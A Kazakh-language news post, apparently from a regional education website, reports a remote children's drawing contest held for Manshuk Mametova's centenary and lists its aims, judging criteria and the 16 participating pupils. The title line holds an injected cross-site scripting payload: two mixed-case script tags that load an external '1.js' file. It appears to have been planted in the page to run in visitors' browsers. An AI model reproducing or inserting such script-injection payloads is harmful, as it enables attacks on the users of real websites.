сурет салу байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.10.2022

Ағымдағы жылдың 28 қазанында Мәншүк Мәметованың 100 жылдығына арналған қашықтықтан сурет салу байқауының аудандық кезеңі өткізілді. Байқау балалар жылына арналған.

Мақсаттары мен міндеттері:

- шығармашылық қабілеттер мен бастамаларды іске асыруды ынталандыру, сондай-ақ балалар мен жасөспірімдердің жалпы мәдени деңгейін арттыру;

- жас ұрпақтың сұлулыққа деген қызығушылығын қалыптастыру;

- дарынды балаларды анықтау және олардың шығармашылық әлеуетін ашу.

Бағалау критерийлері:

- ұсынылған жұмыс мазмұнының конкурс тақырыбына сәйкестігі;

- өзіндік ерекшелігі, шығармашылық жаңалығы, тақырыптың ерекше ашылуы мен көрінісі;

- жұмыстың эстетикасы мен сұлулығы;

- шығармашылық ниет;

- жұмыстың көркемдік деңгейі, шығармашылық деңгейдің автордың жасына сәйкестігі;

- көркемдік шеберлік.

Байқау білім беру ұйымдарының 5-7 сынып оқушылары арасында өткізілді. Аталған байқауға ауданның білім беру ұйымдарының 16 оқушысы қатысты.

 

 

Просмотров: 694


Пікір қосу



Деректерді қолтаңбаға қосу